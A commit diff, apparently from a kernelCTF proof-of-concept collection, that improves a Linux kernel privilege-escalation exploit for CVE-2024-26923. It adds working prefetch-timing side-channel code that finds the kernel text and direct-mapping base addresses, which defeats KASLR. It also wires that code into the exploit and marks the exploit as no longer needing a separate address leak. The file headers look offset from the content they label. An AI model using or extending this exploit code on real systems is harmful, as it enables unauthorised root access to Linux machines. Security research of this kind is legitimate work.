CVE-2024-26923_lts_cos: add side-channel leaks

Author: lambdasprocket

pocs/linux/kernelctf/CVE-2024-26923_lts_cos/exploit/cos-109-17800.147.54/exploit

@@ -830,7 +830,7 @@ void one_attempt(int tfd, int tfd2, int xattr_fd, int *fds)
                 .event = g_event1
         };
 
-        carg.delay1 = 22;
+        carg.delay1 = 20;
         carg.delay2 = 20;
         printf("delays: %d %d try: %d\n", carg.delay1,  carg.delay2, carg.try);
         usleep(50000);

pocs/linux/kernelctf/CVE-2024-26923_lts_cos/exploit/cos-109-17800.147.54/exploit.c

@@ -2,8 +2,8 @@ INCLUDES =
 LIBS = -pthread -ldl
 CFLAGS = -fomit-frame-pointer -static -fcf-protection=none
 
-exploit: exploit.c kernelver_6.6.27.h
-	gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)
+exploit: exploit.c kaslr.c kernelver_6.6.27.h
+	gcc -o $@ exploit.c kaslr.c $(INCLUDES) $(CFLAGS) $(LIBS)
 
 prerequisites:
 	sudo apt-get install libkeyutils-dev

pocs/linux/kernelctf/CVE-2024-26923_lts_cos/exploit/lts-6.6.27/Makefile

@@ -71,6 +71,8 @@ static uint64_t g_kernel_text;
 char *g_stack1;
 #define STACK_SIZE (1024 * 1024)    /* Stack size for cloned child */
 uint64_t leak_kernel_text();
+uint64_t leak_direct_mapping();
+
 
 static int g_event1;
 
@@ -941,23 +943,13 @@ int main(int argc, char **argv)
         if (setrlimit(RLIMIT_NOFILE, &rlim) < 0)
                 err(1, "setrlimit()");
 
-        if (0 && argc > 1 && (argv[1][0] == 'f' || argv[1][0] == '0')) {
-                g_kernel_text = strtoull(argv[1], NULL, 16);
-                printf("Using kernel base: 0x%lx\n", g_kernel_text);
-        } else {
-                printf("Using default kernel base, your chance is 1/512, good luck!\nTry providing leaked kernel base as argv[1]\n");
-
-                g_kernel_text = 0xffffffff81000000uL;
-        }
-
-        if (argc > 2 && (argv[2][0] == 'f' || argv[2][0] == '0')) {
-                g_page_offset_base = strtoull(argv[2], NULL, 16);
-        } else {
-                g_page_offset_base = 0xffff888000000000L;
-        }
+        g_kernel_text = leak_kernel_text();
+        printf("Using kernel base: 0x%lx\n", g_kernel_text);
 
+        g_page_offset_base = leak_direct_mapping();
         printf("Using page_offset_base 0x%lx\n", g_page_offset_base);
 
+
         setbuf(stdout, NULL);
 
         g_mmapped_buf = mmap(NULL, MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE, -1, 0);

pocs/linux/kernelctf/CVE-2024-26923_lts_cos/exploit/lts-6.6.27/exploit

@@ -0,0 +1,177 @@
+#define _GNU_SOURCE
+#include <stdint.h>
+#include <stdio.h>
+#include <string.h>
+#include <sched.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <sys/param.h>
+
+// Some of this code is based on Prefetch Side-Channel work by Daniel Gruss
+
+size_t hit_histogram[4000];
+size_t miss_histogram[4000];
+
+inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
+  uint64_t a, d;
+  asm volatile ("mfence\n\t"
+    "RDTSCP\n\t"
+    "mov %%rdx, %0\n\t"
+    "mov %%rax, %1\n\t"
+    "xor %%rax, %%rax\n\t"
+    "mfence\n\t"
+    : "=r" (d), "=r" (a)
+    :
+    : "%rax", "%rbx", "%rcx", "%rdx");
+  a = (d<<32) | a;
+  return a;
+}
+
+inline __attribute__((always_inline)) uint64_t rdtsc_end() {
+  uint64_t a, d;
+  asm volatile(
+    "xor %%rax, %%rax\n\t"
+    "mfence\n\t"
+    "RDTSCP\n\t"
+    "mov %%rdx, %0\n\t"
+    "mov %%rax, %1\n\t"
+    "mfence\n\t"
+    : "=r" (d), "=r" (a)
+    :
+    : "%rax", "%rbx", "%rcx", "%rdx");
+  a = (d<<32) | a;
+  return a;
+}
+
+void prefetch(void* p)
+{
+  asm volatile ("prefetchnta (%0)" : : "r" (p));
+  asm volatile ("prefetcht2 (%0)" : : "r" (p));
+}
+
+size_t onlyreload(void* addr) // row hit
+{
+  size_t time = rdtsc_begin();
+  prefetch(addr);
+  size_t delta = rdtsc_end() - time;
+  //maccess((void*)0x500000);
+  return delta;
+}
+
+#define TRIES (1*128*1024)
+
+size_t measure(size_t addr)
+{
+    memset(hit_histogram,0,4000*sizeof(size_t));
+
+    for (int i = 0; i < TRIES; ++i)
+    {
+      size_t d = onlyreload((void*)addr);
+      hit_histogram[MIN(3999,d)]++;
+    }
+
+    size_t sum_hit = 0;
+    size_t hit_max = 0;
+    size_t hit_max_i = 0;
+    for (int i = 0; i < 4000; ++i)
+    {
+      if (hit_max < hit_histogram[i])
+      {
+        hit_max = hit_histogram[i];
+        hit_max_i = i;
+      }
+      sum_hit += hit_histogram[i] * i;
+    }
+
+    return sum_hit / TRIES;
+}
+
+
+uint64_t leak_kernel_text()
+{
+        cpu_set_t set;
+        uint64_t bad_time, time, addr;
+
+        CPU_ZERO(&set);
+        CPU_SET(0, &set);
+
+        if (sched_setaffinity(getpid(), sizeof(set), &set) == -1) {
+                perror("sched_setaffinity");
+                return -1;
+        }
+        
+// First measurement is always trash
+        bad_time = measure(0xffffffff00000000);
+
+        bad_time = measure(0xffffffff00000000);
+
+//        printf("Timing for non-existent kernel page: %zu\n", bad_time);
+
+        for (addr = 0xffffffff81000000L; addr < 0xffffffffff000000L; addr += 0x100000)
+        {
+                time = measure(addr);
+
+                printf("0x%lx: %zu\n", addr, time);
+
+                if (time > 190)
+                        break;
+        }
+
+// Renable all CPUs
+        for (int i = 1; i < 4; i++)
+        {
+                CPU_SET(i, &set);
+        }
+
+        if (sched_setaffinity(getpid(), sizeof(set), &set) == -1) {
+                perror("sched_setaffinity");
+                return -1;
+        }
+
+        return addr;
+}
+
+uint64_t leak_direct_mapping()
+{
+        cpu_set_t set;
+        uint64_t bad_time, time, addr;
+
+        CPU_ZERO(&set);
+        CPU_SET(0, &set);
+
+        if (sched_setaffinity(getpid(), sizeof(set), &set) == -1) {
+                perror("sched_setaffinity");
+                return -1;
+        }
+        
+// First measurement is always trash
+        bad_time = measure(0xffffffff00000000);
+
+        bad_time = measure(0xffffffff00000000);
+
+//        printf("Timing for non-existent kernel page: %zu\n", bad_time);
+
+        for (addr = 0xffff888000000000L; addr < 0xffffc88000000000L; addr += 0x10000000)
+        {
+                time = measure(addr);
+
+                printf("0x%lx: %zu\n", addr, time);
+
+                if (time > 190)
+                        break;
+        }
+
+// Renable all CPUs
+        for (int i = 1; i < 4; i++)
+        {
+                CPU_SET(i, &set);
+        }
+
+        if (sched_setaffinity(getpid(), sizeof(set), &set) == -1) {
+                perror("sched_setaffinity");
+                return -1;
+        }
+
+        return addr;
+}

pocs/linux/kernelctf/CVE-2024-26923_lts_cos/exploit/lts-6.6.27/exploit.c

@@ -24,7 +24,7 @@
         "lts-6.6.27": {
           "uses": [
           ],
-          "requires_separate_kaslr_leak": true,
+          "requires_separate_kaslr_leak": false,
           "stability_notes": "90% success rate"
         },
         "cos-109-17800.147.54": {